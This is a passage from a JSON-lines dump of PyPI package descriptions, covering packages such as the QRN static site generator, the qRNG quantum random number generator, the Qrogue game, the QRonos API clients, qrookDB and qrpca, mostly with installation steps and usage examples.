\u201cAS\nIS\u201d AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\nTO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\nPARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\nHOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED\nTO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\nPROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\nNEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."} +{"package": "qrn", "pacakge-description": "QRN: A simple, highly opinionated static site generatorQRN is a static site generator that is as simple as I can make\nit while still being useful. QRN assumes that most of your content\nis in markdown format, that you are using sass/scss or plain old css\nfor styling. QRN is also geared towards modest sized content, the\nkind of thing you might find in a personal blog.QRN also supports a simple but flexible layout/templating system\nthat let's you specify a standard HTML \"frame\" around your content\nand also embed executable Python code in the content.A key feature of QRN is that it has very few external dependencies.\nQRN is written in a fairly generic Python 3 and requires:The PyYAML Python library.An external program that turns markdown into HTML (currently pandoc).And external program that turns scss/sass into css (currently sass).That's it. What this means is that QRN is easy to set up and\n(I hope) will continue to work over time as libararies and packages\nchange.What does QRN mean?Ham radio operators use ashorthand codethat has its origins in the early days of telegraphy. QRN is the code that means\n\"I am troubled by static noise.\"Using QRNQRN works like most static site generators: You prepare a directory with\nroughly the content you want to show up in your final site. When you run\nQRN it transforms your source content into a final output site that you can\nthen deploy. The value of QRN is that it performs various transformation as\nit does the copying:QRN knows how to tranform markdown files into html.QRN knows how to do \"include\" processing on your content so\nthat you can write the common parts of your site once.The key idea behind QRN is that it is extremely opinionated about a few\nthings -- mostly around a some key naming conventions and how those\nfiles are processed into your final static webstite.Specifically:QRN wants you to put the source for your site under a directory calledsrc.QRN generally ignores files and directories whose names start with an underbar (.e.g.src/_save).QRN wants you to put the source for all included files and layouts (see below) insrc/_layouts.When you run QRN it will put the resulting processed, read-to-go site in a directory calledbuild.QRN will run all files with a.htmlor.xmlextension through theepyprocessor (see below).QRN will run all files with a.hamlextension through thepamlprocessor (see below).QRN will run all files with a.mdextension through theepyprocessor and then convert it to HTML.QRN will run all files with a.sassor.scssextension through thesassprocessor.Otherwise, QRN will just copy files fromsrctobuild.File headers and layouts.In general, QRN will recognize YAML headers at the beginning of .md, .html, .xml and .haml files. The headers\nare set off from the file content with three dashes:---\ntitle: A simple html file.\ndate: klsdfklj\n---\n\n \n A simple html file.\n \nThe EPy ProcessorAs mentioned above, QRN runs .md, .html and .xml files through the Embedded Python (or EPy) processor.\nEPy allows you to embed code that is evaluated at site build time in your content.\nEPy uses the commontext <%= some_code() %> more textsyntax, reminencent ofEmbedded Ruby. Specifically:<%= some_code() %>will insert the result of evaluating the Python code into the text. Thus1 <%= 100/50 %> 3will result in1 2 3.<%! other_code() !%>will simply evaluate the Python code and ignore the result.Python's indentation based approach to syntax presents a special challenge to EPy: Requiring significant whitespace\nin embedded code would be error prone and confusing. Instead, EPy strips off leading whitespace and relies on the\ntraining:'s to open code blocks and a special <%! end %> directive to close them. Here, for example is a\nloop in EPy:<%! for x in range(1): %>\nThe number is <%= x %>\n<%! end %>And anifstatement in EPy:<%! count = 0 %>\n<%! if count: %>\nThe count is non-zero.\n<%! else: %>\nThe counts is zero.\n<%! end %>Note that the<%! end %>does not appear in the actual Python code. It\nis just a marker that theiforforhas ended.The Paml ProcessorSimilarly, QRN includes a \"Paml\" processor. Paml is like Haml, but it uses Python\nin place of Ruby. Other than that syntax is more or less Haml. Here's an example:---\nkind: partial\n---\n.twelve.columns\n %ul.menu\n %li.menu\n %a{\"href\": \"/index.html\"} Contents\n %li.menu\n %a{\"href\": \"/credit.html\"} Credits\n %li.menu\n %a{\"href\": \"/license.html\"} License\n %li.menu\n %a{\"href\": \"/205-0.txt\"} Original File"} +{"package": "qrnet", "pacakge-description": "qrnetA simple command-line tool to generate QR codes for Wi-Fi credentials.InstallationInstallqrnetusing pip:pip install qrnetUsageTo generate a QR code for your Wi-Fi:qrnet [-f filename.png]ArgumentsSSID: The SSID of your Wi-Fi network.Password: The password for your Wi-Fi network.Encryption Type: Choose from WEP, WPA, or WPA2.filename (optional): Specify the filename for the QR code image. If not provided, the default iswifi_qr.png.ContributingPull requests are welcome."} +{"package": "qrng", "pacakge-description": "qRNGis an open-source quantum random number generator written in python. It achieves this by using IBM'sQISKitAPI to communicate with any one of their publicly accessible quantum computers:ibmq_armonk1 qubitibmq_london5 qubitsibmq_burlington5 qubitsibmq_essex5 qubitsibmq_ourense5 qubitsibmq_vigo5 qubitsibmqx25 qubitsibmq_qasm_simulator32 qubits (simulated)qasm_simulator8 qubits (simulated)Note that you need to input your IBMQ API token (make an IBMQ accounthere) to access any of these quantum computers/simulators, except forqasm_simulatorwhich can be accessed locally via the instructions below.InstallationYou can use the pip package manager to install thecurrent releaseof qRNG (along with its dependencies):pip install qrngUpgrading is as simple as:pip install qrng -UTutorialNow you can try generating your first random number. First open python in the shell or use an IDE:$pythonNow let's connect qRNG to our IBMQ account and generate some numbers:>>>importqrng>>>qrng.set_provider_as_IBMQ('YOUR_IBMQ_TOKEN_HERE')#the IBMQ API token from your dashboard>>>qrng.set_backend('ibmq_london')#connect to the 5 qubit 'ibmq_london' quantum computer>>>qrng.get_random_int32()#generate a random 32 bit integer3834878552>>>qrng.get_random_float(0,1)#generate a random 32 bit float between 0 to 10.6610504388809204If you don't need or want to use IBM's actual quantum computers, you can instead just use the default backend like so:>>>importqrng>>>qrng.set_provider_as_IBMQ('')#empty string denotes local backend which can only use 'qasm_simulator'>>>qrng.set_backend()#no args defaults to `qasm_simulator`>>>qrng.get_random_int64()#generate a random 64 bit integer10110319200202513540>>>qrng.get_random_double(0,1)#generate a random 64 bit double between 0 to 10.9843570286395331What is Random Number Generation?There are a variety of applications that require a source of random data in order to work effectively (e.g. simulations and cryptography). To that end, we make use of random number generators (RNGs) to generate sequences of numbers that are, ideally, indistinguishable from random noise.There are two types of RNGs: Pseudo-RNGs (PRNGs) and True RNGs (TRNGs). Pseudo-RNGs, while not truly and statistically random, are used in a variety of applications as their output is 'random enough' for many purposes.For a True RNG, however, an actual piece of hardware is required to measure some random process in the real world as no computer program could suffice due to being deterministic in nature. These devices vary from apparatuses that measure atmospheric noise to pieces of radioactive material connected via USB.Why Quantum?Modern physics has shown us that there are really only two types of events that can happen in the universe: the unitary transformation of a quantum system, and quantum wavefunction collapse (i.e.measurement). The former being a totally deterministic process and the latter being a random one.Indeed, all randomness in the universe (as far we know) is the result of the collapse of quantum systems upon measurement. In a sense, this is randomness in its purest form and the underlying source of it in any TRNG.The point of this package then, besides it being a fun side project, is to cut out the middle man entirely, whether it be a radioactive isotope or the thermal noise in your PC, and simply measure an actual quantum system. For example, we can prepare the following state in a quantum computer:There is a 50-50 chance of measuring the above state as a 0 or 1 and we can continually iterate this process for as many random bits as we require. Note that while such a simple algorithm doesn't require a full-blown quantum computer, there are some random algorithms that do.PracticalityOf course, while the numbers generated from a quantum computer are amongst the most random, the practicality of connecting to one of IBM's quantum computers to generate a large amount of these numbers is nonexistent. For most real world use cases that require such high-caliber random numbers, an off the shelf hardware RNG would suffice. The purpose of this package is thus to provide a working example of how a real cloud based quantum random number generator may operate."} +{"package": "qrnn", "pacakge-description": "No description available on PyPI."} +{"package": "qrnr", "pacakge-description": "No description available on PyPI."} +{"package": "qr-obelix", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrogue", "pacakge-description": "_______ \n / _____ \\ \n | | | | \n | | | | \n | | | | _ __ ___ __ _ _ _ ___ \n | | | | | '__/ _ \\ / _` | | | |/ _ \\\n | |_____| | | | | (_) | (_| | |_| | __/ \n \\______\\_\\ |_| \\___/ \\__, |\\__,_|\\___| \n __/ | \n |___/ASCII-Art generated byhttps://www.ascii-art-generator.org/Qrogue v0.7.0Qrogue is a modernized Quantum Computing take of the classical gameRogue.You will play as a student whose dream is to travel through the galaxy.\nAs they hear about \"Mission Quniverse\" they immediately apply for its\ntraining program to be able to join this fascinating Quantum Computing\npowered universe exploration mission.Table of ContentsInstallationDependenciesLinuxWindowsNotesHow to play - ControlsOutlookInstallationDependenciespy_cui 0.1.4qiskit 0.34.2numpy 1.20.3antlr4-python3-runtime 4.10However, these dependencies are installed automatically if you install Qrogue via pip.Linux/macOSPrerequisitesPython 3.8pipFor Linux/macOS you simply have to runpipinstallqrogueto install Qrogue in your current Python environment.Afterwards you can launch the game simply by executingqroguein the Python environment you installed Qrogue in.WindowsPrerequisitesSame as for Linux/macOSNotespy_cui.errors.PyCUIOutOfBoundsErrorShould you ever encounter this error\nwhen starting the game please try to maximize the console you\nuse for playing. This is because currently there is no automatic\nfont size adaption so depending on your console settings a\nminimum width and height is required. Alternatively or if\nmaximizing doesn't help you can also lower the font size of the\nconsole.newer Python versionsUsually also Python 3.9 should perfectly work for\nplaying Qrogue but testing is currently done for Python 3.8 so\nthere is no official support yet for other versions. The same\nis true if you decide to manually install the dependencies; newer\nversion will likely work but are not recommended.\nPython 3.10 is not yet supported due to changes in import locations.How to play - ControlsNavigate in menus: Arrow Keys, wasdMove in game world: Arrow Keys, wasdScroll in popup: Arrow Keys, wasdClose popup: Space, EnterReopen last popup: HSelect answer in question popup: horizontal Arrow Keys, adConfirm selection (also in question popup): Space, EnterCancel/back: Shift+A, Shift+Left, BackspacePause: P, TabSituationalshortcut keys: 0-9Debug Keys (not for use in normal play through!)Print screen: CTRL+PForce re-render: CTRL+RFeedbackWe'd be very happy if you share any feedback with us, regardless whether you liked the game or not.\nJust send it via Email tomichael.artner@jku.atwith the subject \"Qrogue Feedback\".\nIt would also be nice if you could add your user-data folder (\"qrogue/QrogueData\", for normal installations it can be found in your virtual environment's packages) with the log files. Thanks!If you find a typo: In the title of the popup window you should find something like \"{@abc}\" where abc is the message id.\nPlease do tell us the message id so we have an easier time fixing it. Thanks!Outlook"} +{"package": "qronos-client", "pacakge-description": "qronos-clientPython client for QRonosInstallationThis package can be installed via pip:pip install qronos-clientExample UsageAuthenticationfromqronosimportQRonosClient# Create client and loginqronos=QRonosClient(host='https://dev.qronos.xyz')token,expiry=qronos.login(username='Quentin',password='Rogers')# Alternatively, if you already have a tokenqronos=QRonosClient(host='https://dev.qronos.xyz',token='ABCDEFGHIJKLMN')# Logoutqronos.logout(all_tokens=True)Tracker (Item) Data Import# Import Tracker (Item) Datajob_id=qronos.tracker_import(tracker_id=24,unique_columns=[\"Part Number\",\"Weight\"],can_add_item=True,can_delete_item=False,data=[{\"Part Number\":\"A1\",\"Weight\":5},{\"Part Number\":\"A2\",\"Weight\":8}],)Stage Data Import# Import Stage Datajob_id=qronos.stage_import(stage_id=2,data=[{\"Part Number\":\"A1\",\"leadtime\":5},{\"Part Number\":\"A2\",\"actual\":\"2020-10-26\"}],)Stage Data Import by Tracker Stage# Import Stage Datajob_id=qronos.stage_import(tracker_stage_id=2,data=[{\"Part Number\":\"A1\",\"leadtime\":5},{\"Part Number\":\"A2\",\"actual\":\"2020-10-26\"}],)Import Status# Check Status of an Importstatus=qronos.import_status(job_id=job_id)Delete Items# Delete Itemsjob_id=qronos.delete_items(tracker_id=2,data=[\"A\",\"B\"],)Paginated servicesTheget_item_attributes,get_item_stages,get_item_stage_historyandget_all_item_attribute_historyservices return paginated responses in the form:{\"next\":\"http://127.0.0.1:8000/api/attributes/?cursor=cD0x&page_size=1\",\"previous\":null,\"items\":[{},...]}Thenextandpreviousfields contain the API url for the next/previous pages respectively.\nIf there are no next or previous pages the value would benull.All items can be returned as a single list of items by theget_all_item_datamethod.Following are some usage examples for theget_item_attributesservice. Pagination works the same way for all the services. I.e. you can use the same example by just changing the name of the service.# Request the first page of datadata=qronos.get_item_attributes(tracker=3,page_size=2,)# Request the next page. This will use the same page_size as the previous request.data=qronos.get_item_attributes(tracker=3,page=data.get(\"next\"))# Request the next next page. Use page_size to change the size of the page.data=qronos.get_item_attributes(tracker=3,page=data.get(\"next\"),page_size=10,)# Request the previous pagedata=qronos.get_item_attributes(tracker=3,page=data.get(\"previous\"))# Requesting all the pages using a while loopall_data=[]data=qronos.get_item_attributes(tracker=3,page_size=10)all_data.extend(data.get('items'))whilenextp:=data.get('next'):data=qronos.get_item_attributes(tracker=3,page=nextp)all_data.extend(data.get('items'))Get Item Attribute DataAt minimum you must request atrackeror aunique_key/unique_keysYou cannot request both aunique_keyandunique_keysUsepage_sizeto change the size of the paginated resultUsepageto navigate to next/previous page# Get Item Attribute Data by trackeritem_data=qronos.get_item_attributes(tracker=3,show_non_mastered=False,show_mastered=True,)# Get Item Attribute Data by unique keysitem_data=qronos.get_item_attributes(unique_keys=[\"800000689\",\"800000726\",\"800000727\"],show_non_mastered=True,show_mastered=True,)# Get Item Attribute Data by single unique keyitem_data=qronos.get_item_attributes(unique_key=\"800000689\",show_non_mastered=False,show_mastered=True,)# Get Item Attribute Data by single unique key for only a single trackeritem_data=qronos.get_item_attributes(unique_key=\"800000689\",tracker=4,show_non_mastered=False,show_mastered=True,)Get Item Stage DataAt minimum you must request atrackeror aunique_key/unique_keysYou cannot request both aunique_keyandunique_keysYou cannot request both astageandstagesYou cannot request both atracker_stageandtracker_stagesYou cannot request a combinations ofstageandtracker_stagefieldsUsepage_sizeto change the size of the paginated resultUsepageto navigate to next/previous page# Get Item Stage Data for a trackerstage_data=qronos.get_item_stages(tracker=3)# Get Item Stage Data by unique keysstage_data=qronos.get_item_stages(unique_keys=[\"800000689\",\"800000726\",\"800000727\"])# Get Item Stage Data by single unique key but only for a single stagestage_data=qronos.get_item_stages(unique_key=\"800000689\",stage=54,)# Get Item Stage Data by single unique key but only for a single tracker stagestage_data=qronos.get_item_stages(unique_key=\"800000689\",tracker_stage=12,)# Get Item Stage Data for a list of stages on a certain trackerstage_data=qronos.get_item_stages(tracker=4,stages=[54,55,56],)# Get Item Stage Data for a list of tracker stages on a certain trackerstage_data=qronos.get_item_stages(tracker=4,tracker_stages=[12,13,14],)Get Item Stage History DataGet the history of changes to ItemStages.\nRequest follow the same pattern as for Get Item Stage with the addition of the following options:# Get changes between a start and end date on a particular trackerstage_history_data=qronos.get_item_stage_history(tracker=4,interval_start_date=\"2020-12-25\",# using ISO-8601 format (YYYY-MM-DD)interval_end_date=\"2021-12-25\",)# Get ItemStageHistory for the changes to the \"actual\" and \"leadtime\" fields of ItemStages on a particular trackerstage_history_data=qronos.get_item_stage_history(tracker=4,fields=[\"actual\",\"leadtime\"])Get All Data MethodsThese methods will loop through eachpageand aggregate the data into a single list of items.get_all_item_attributesget_all_item_stagesget_all_item_stage_historyget_all_item_attribute_history# Get all Item Attribute Data for a trackerattributes_data=qronos.get_all_item_attributes(tracker=3)# Get all Item Stage Data for a trackerstage__data=qronos.get_all_item_stages(tracker=3)# Get all Item Stage History Data for a trackerattribute_data=qronos.get_all_item_stage_history(tracker=3)# Get all Item Attribute History Data for a tracker & attributesattribute_history=qronos.get_all_item_attribute_history(tracker=4,attribute_names=[\"Attribute A\",\"Attribute B\"],page_size=500,)TestingPlease speak with a QRonos Demo Site Admin for credentials in order to run the tests."} +{"package": "qronos-django", "pacakge-description": "qronos-djangoDjango package for using the QRonos Python ClientInstallationThis package can be installed via pip:pip install qronos-djangoAdd to yourINSTALLED_APPS:INSTALLED_APPS=[...\"qronos_django\",...]Required SettingsQRONOS_HOSTDefault:\"dev.qronos.xyz\"The URL host of the QRonos instance.QRONOS_USERDefault:\"\"The username with which to authenticate.QRONOS_PASSWORDDefault:\"\"The password with which to authenticate.Optional SettingsQRONOS_TOKEN_CACHE_KEYDefault:\"QRONOS_TOKEN\"The name of the cache key for TokensQRONOS_TOKEN_CACHE_FRACTIONDefault:0.8What fraction of the total lifetime of tokens to cache. Set to 0 to disable Token caching.QRONOS_LOGGINGDefault:TrueCreate QRonosImportLog items in the Database to track the triggered QRonos ImportsQRONOS_ID_LOGGINGDefault:FalseStore the tracker/stage ID's in the QRonosImportLog itemsQRONOS_DATA_LOGGINGDefault:FalseStore the data sent in the QRonosImportLog itemsExample Usagefromqronos_django.importsimporttracker_import,stage_import,delete_itemsfromqronos_django.tasksimportupdate_qronos_log_status# Import Tracker (Item) Data# If QRONOS_LOGGING enabled then this will create a QRonosImportLog item and return it, otherwise returns Noneimport_log=tracker_import(tracker_id=24,unique_columns=[\"Part Number\",\"Weight\"],can_add_item=True,can_delete_item=False,data=[{\"Part Number\":\"A1\",\"Weight\":5},{\"Part Number\":\"A2\",\"Weight\":8}],)# Import Stage Data# If QRONOS_LOGGING enabled then this will create a QRonosImportLog item and return it, otherwise returns Noneimport_log=stage_import(stage_id=2,data=[{\"Part Number\":\"A1\",\"leadtime\":5},{\"Part Number\":\"A2\",\"actual\":\"2020-10-26\"}],)# Import Stage Data by Tracker Stage# If QRONOS_LOGGING enabled then this will create a QRonosImportLog item and return it, otherwise returns Noneimport_log=stage_import(tracker_stage_id=2,data=[{\"Part Number\":\"A1\",\"leadtime\":5},{\"Part Number\":\"A2\",\"actual\":\"2020-10-26\"}],)# Delete Items# If QRONOS_LOGGING enabled then this will create a QRonosImportLog item and return it, otherwise returns Noneimport_log=delete_items(tracker_id=2,data=[\"A\",\"B\"],)# Update (and return) status of a single QRonos Import Log. Can pass optional qronos parameter if you already have a QRonosClient object.status=import_log.update_import_status()# (Async) Update Status of a set of QRonos Import Logs (note use QRonosImportLog ids, not job ids)update_qronos_log_status.delay([125,233])"} +{"package": "qrookDB", "pacakge-description": "InitializingThis package represents a new ORM to work with SQL-syntax databases (for now, only PostgreSQL and SQLite are natively supported,\nbut you may inherit your own connectors from IConnector abstract class).To start working, all you need to do is import a package's facade object and initialise it:importqrookDB.DBasDBDB=DB.DB('postgres','db_name','username','password',format_type='dict')DB.create_logger(app_name='qrookdb_test',file='app_log.log')DB.create_data(__name__,in_module=True)Here we first created a database connection, providing connect parameters (format_type defines the form\nin which results'll be returned - 'list' and 'dict' supported),\nthen initialized an internal logger to write both in console and file.\nNote that instead of 'postgres' you could've sent the instance of the connector (including your own connectors).\nThe 'create_data' function reads database system tables to get info about all user-defined tables,\nand creates QRTable objects based on this info. Now you can use table names (ones given to them in database)\nto access to these objects as DB instance fields (also, configuration showed above adds these table names to\nyour current module, so you can use short names: 'books' instead of 'DB.books').QueryingYou can form execute queries using either DB instance or concrete tables (in this case, you don't need to\nmention in which table to perform queries). To execute any query, use one of 'exec', 'one' and 'all' methods\n(latter two define how many rows to return from query; 'exec' returns None by default). If forming of the query\nfails, it won't be executed at all (and will return None if you try); you can use 'get_error' method of the query\nto get the error description (it will be logged, though). Note: if error occured in the middle of query-building,\nquery will ignore the rest of building proccess.Select queries examplesop=DB.operatorsprint(DB.books)print(books,books.id)# logical 'and' is used by default for multiple where conditions; 'op' module contains special operatorsdata=DB.select(books).where(original_publication_year=2000,language_code='eng').where(id=op.In(470,490,485)).all()# you can add raw-string query parts, but it'll be on your conscience in terms of securityquery=books.select('count(*)').group_by(books.original_publication_year)data=query.all()data=DB.select(books,books.id).where('id < 10').order_by(books.id,desc=True).limit(3).offset(2).all()# here fields have same name ('id'), but via different tables it'll be ok# (for data in dict-format, table-names'll be added to keys)data=books.select(authors.id,books.id).join(books_authors,op.Eq(books_authors.book_id,books.id)).join(authors,op.Eq(books_authors.author_id,authors.id)).all()# .join(books_authors, 'books_authors.book_id = books.id')data=books.select(books.id).where(id=1).where(bool='or',id=2).all()# error - trying to select two equal fields;q=DB.select(events,events.id,events.id).where(id=1)data=q.all()print('data is None here:',data,';\terror:',q.get_error())Update, Insert, Delete queries examples# if auto_commit is not set, you'll have to commit manuallyok=DB.delete(events,auto_commit=True).where(id=1).exec()fromdatetimeimportdatetimet=datetime.now().time()d=datetime.now().date()ok=DB.update(events,auto_commit=False).set(time=t).where(id=6).exec()DB.commit()# other possible variants for values: values([t]), values([d, t])# other possible variants for returning: returning(events.date, events.time), returning(['date', 'time']), returning('date', 'time')query=events.insert(events.date,events.time,auto_commit=True).values([[d,t],[None,t]]).returning('*')data=query.all()# you can also execute fully-raw queries; if you need to return values,use'config_fields'todefineresults' names (not necessary for 'list' data format)data=DB.exec('select * from get_book_authors(1) as f(id int, name varchar)').config_fields('id','name').all()print(data)Table's meta-dataUsing this package you can easily discover your database. DB instance provides information\nabout table's name, its columns (with their name and type) and info about primary and\nforeign keys. Example of function which prints all info about existing tables is shown below.defprint_tables():tables=DB.meta['tables']fortable_name,tableintables.items():meta=table.metaprint(f\"===---{meta['table_name']}---===\")forfield_name,fieldinmeta['fields'].items():pk_flag=field.primary_keyisTrue# or field == meta['primary_key']print(f\"{'(*)'ifpk_flagelse' '}{field.name}:{field.type}\")iflen(meta['foreign_keys']):print('Constraints:')forfields_with_fkinmeta['foreign_keys']:fk=fields_with_fk.foreign_keyprint(f'\tForeign key:{fields_with_fk.name}references{fk.table.meta[\"table_name\"]}({fk.name})')and the result can be:===---publications---===book_id:integerisbn:bigint(*)id:integercreated_at:timestampwithtimezoneisbn13:bigintlanguage_code:charactervaryingpublication_year:smallintinfo:jsonbupdated_at:timestampwithtimezone\nConstraints:Foreignkey:book_idreferencesbooks(id)"} +{"package": "qroundprogressbar", "pacakge-description": "UNKNOWN"} +{"package": "qroutes", "pacakge-description": "Simple Compujure/Ring library for WSGI.Learn more"} +{"package": "qrovkbwaun", "pacakge-description": "Qrovkbwaun=================This API SDK was automatically generated by [APIMATIC Code Generator](https://apimatic.io/).This SDK uses the Requests library and will work for Python ```2 >=2.7.9``` and Python ```3 >=3.4```.How to configure:=================The generated code might need to be configured with your API credentials.To do that, open the file \"Configuration.py\" and edit its contents.How to resolve dependencies:===========================The generated code uses Python packages named requests, jsonpickle and dateutil.You can resolve these dependencies using pip ( https://pip.pypa.io/en/stable/ ).1. From terminal/cmd navigate to the root directory of the SDK.2. Invoke ```pip install -r requirements.txt```Note: You will need internet access for this step.How to test:=============You can test the generated SDK and the server with automatically generated testcases. unittest is used as the testing framework and nose is used as the testrunner. You can run the tests as follows:1. From terminal/cmd navigate to the root directory of the SDK.2. Invoke ```pip install -r test-requirements.txt```3. Invoke ```nosetests```How to use:===========After having resolved the dependencies, you can easily use the SDK following these steps.1. Create a \"qrovkbwaun_test.py\" file in the root directory.2. Use any controller as follows:```pythonfrom __future__ import print_functionfrom qrovkbwaun.qrovkbwaun_client import QrovkbwaunClientapi_client = QrovkbwaunClient()controller = api_client.clientresponse = controller.get_basic_auth_test()print(response)```"} +{"package": "qrpc", "pacakge-description": "# Features* Easy registration of methods* Custom Exception and Options* Includes plenty testing helpers# InstallationOn most systems, its a matter of```bashpip install qrpc```# Quickstart## A Simple ExampleThis is a realy simple example of how to create your own API using QRpc### Server```pythonfrom qrpc.server import Serverserver = Server()@server.registe(\"service1/hello\")def hello(name=None):if name:return \"hello \" + namereturn \"hello anonymous\"@server.registe(\"service1/add\")def add(x, y):return x + yserver.run('127.0.0.1', 8080)```### Client```pythonfrom qrpc.client import RpcClientfrom qrpc.client import ServerProxyserver = ServerProxy('http://localhost:8080/v1/batch')rpc = RpcClient(server=server)result = rpc.service1.hello.call(name='ycc')print(result.data)```# Core content## Request## Response(Result)The response of an rpc request has three attributes that user should concern, rpc_code, data, message.The rpc_code indicates if the rpc request has been successfully received, understood, and accepted. 0 and all the positive numbers are **reserved code**, and can't be used by user.The data is the result of an rpc method.The message provides some helpful information.## ExceptionsYou can define an RPCException and raise it when you want to tell the caller there is something wrong in some rpc method. For example a division rpc method and the second argument of a division is zero.```python# serverfrom qrpc.exceptions import RPCFaultException@server.registe(\"service/div\")def test_div(x, y):if y == 0:raise RPCFaultException(code=99, # Use any code in your as you like except reserved code.message=\"ZeroDivisionError: integer division or modulo by zero\")return x / y# clientdiv_result = rpc.service.div.call(x=1, y=0)```The QRpc will catch the exception and wrap it in reponse.#Lazy Call and EvaluationRPC call are lazy--the act of creating an rpc call doesn't send the network request to server. You can stack call together all day long, and the framework won't actually send the network request until one of the calls is evaluated. You can get detail from the following example:```pythonadd_result = rpc.service.add.call(x=1, y=2)dict_result = rpc.service.dictionary.call(dictionary={\"test_key\": \"test_value\"})hello_result = rpc.service.hello.call(name='world')print (add_result.data) # only one network requestprint (dict_result.data)print (hello_result.data)```Though this looks like sending three rpc call request, in fact it only send one network request, at the \"add_result.data\" line. An rpc call is just added into a job list when it is constructed. The real network request will be executed when any of the 'rcp call' in the job list is evaluated. The framework evaluates all the rpc call in the job list at one time. So only send one network request.You can evaluate an rpc call by get any attribute of the rcp result.In the last example, there are three rpc calls in the job list. The three rpc calls are evaluated at one network request when you get the data of add_result.So dict_result.data or hello_result.data won't cause any network request.In general, the result of an rpc call isn't fetched from the server until you ask them.# Adcanced Usage# TODO"} +{"package": "qrpca", "pacakge-description": "QRPCAqrpca works similarly to sklean.decomposition, but employs a QR-based PCA decomposition and supports CUDA acceleration via torch.How to installqrpcaTheqrpcacan be installed by the PyPI and pip:pip install qrpcaIf you download the repository, you can also install it in theqrpcadirectory:git clone https://github.com/xuquanfeng/qrpca\ncd qrpca\npython setup.py installYou can access it by clicking onGithub-qrpca.UsageHere is a demo for the use ofqrpca.The following are the results of retaining principal components containing 95% of the information content by principal component analysis.You can set the parametern_componentsto a value between 0 and 1 to execute the PCA on the corresponding proportion of the entire data, or set it to an integer number to reserve then_omponentscomponents.import torch\nimport numpy as np\nfrom qrpca.decomposition import qrpca\nfrom qrpca.decomposition import svdpca\n\n# Generate the random data\ndemo_data = torch.rand(60000,2000)\nn_com = 0.95\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# qrpca\npca = qrpca(n_component_ratio=n_com,device=device) # The percentage of information retained.\n# pca = qrpca(n_component_ratio=10,device=device) # n principal components are reserved.\ndemo_qrpca = pca.fit_transform(demo_data)\nprint(demo_pca)\n\n# SVDPCA\npca = svdpca(n_component_ratio=n_com,device=device)\ndemo_svdpca = pca.fit_transform(demo_data)\nprint(demo_svdpca)Comparision with sklearnThe methods and usage ofqrpcaare almost identical to those ofsklearn.decomposition.PCA. If you want to switch fromsklearntoqrpca, all you have to do is change the import and declare the device if you have a GPU, and that's it.And here's an illustration of how minimal the change is when differentPCAis used:qrpca.decomposition.qrpcafrom qrpca.decomposition import qrpca \ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\npca = qrpca(n_component_ratio=n_com,device=device)\ndemo_qrpca = pca.fit_transform(demo_data)qrpca.decomposition.svdpcafrom qrpca.decomposition import svdpca\npca = svdpca(n_component_ratio=n_com)\ndemo_svdpca = pca.fit_transform(demo_data)sklearn.decomposition.PCAfrom sklearn.decomposition import PCA\npca = PCA(n_components=n_com)\ndemo_pca = pca.fit_transform(demo_data)Performance benchmark sklearnWith the acceleration of GPU computation, the speed of both QR decomposition and singular value decomposition inqrpcais much higher than that insklearnWe run the different PCA methods on data with different numbers of rows and columns, and then we compare their PCA degradation times and plotted the distribution of the times. Here are the two plots.Comparison of PCA degradation time with different number of rows and different methods for the case of 1000 columns.Comparison of PCA reduction time with different number of columns and different methods for the case of 30000 rows.We can see from the above two facts thatqrpcamay considerably cut program run time by using GPU acceleration, while also having a very cheap migration cost and a guaranteed impact.Requirementsnumpy>=1.21.1pandas>=1.3.5torch>=1.8.1torchvision>=0.8.0cudatoolkit>=0.7.1scikit-learn>=1.0.2Copyright & License2022 Xu Quanfeng (xuquanfeng@shao.ac.cn) & Rafael S. de Souza (drsouza@shao.ac.cn) & Shen Shiyin (ssy@shao.ac.cn) & Peng Chen (pengchzn@gmail.com)This program is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.ReferencesSharma, Alok and Paliwal, Kuldip K. and Imoto, Seiya and Miyano, Satoru 2013, International Journal of Machine Learning and Cybernetics, 4, 6, doi:10.1007/s13042-012-0131-7.CitingqrpcaIf you want to citeqrpca, please use the following citations.Software Citation: Xu Quanfeng, & Rafael S. de Souza. (2022). PCA algorithm of QR accelerated SVD decomposition (1.5). Zenodo.https://doi.org/10.5281/zenodo.6555926"} +{"package": "qrpic", "pacakge-description": "A command-line tool to create beautiful QR-codes with perfectly fitting logos!Usageqrpic takes (for the moment) only SVG images and produces an output SVG.\nYou invoke it simply withqrpic\"data text or link you want in your qr code\"path-to-logo.svgqrpic computes the exact shape of the SVG and removes QR-code pixels that are\nin the way, so they don\u2019t disturb your logo.qrpic offers various options to control the logo size, adding shells and buffer\nareas around your logo so it looks proper with just the right amount of spacing.\nFor more info, queryqrpic--help:usage: qrpic [-h] [--out FILE] [--shell {none,viewbox,convex,boundary-box}]\n [--ppi VALUE] [--svg-area VALUE] [--border VALUE]\n [--error-correction {high,medium,low}] [--buffer VALUE]\n [--shape-resolution VALUE]\n TEXT SVG-FILE\n\nGenerates QR-codes with centered logo images from SVGs in a beautiful manner,\nby not just overlaying them but also removing QR-code pixels properly so they\ndo not interfere with the logo. Note that this tool does not (yet) check\nwhether the generated QR-code is actually valid.\n\npositional arguments:\n TEXT The QR-code text.\n SVG-FILE Logo SVG to center inside the QR code to be generated.\n\noptional arguments:\n -h, --help show this help message and exit\n --out FILE Output 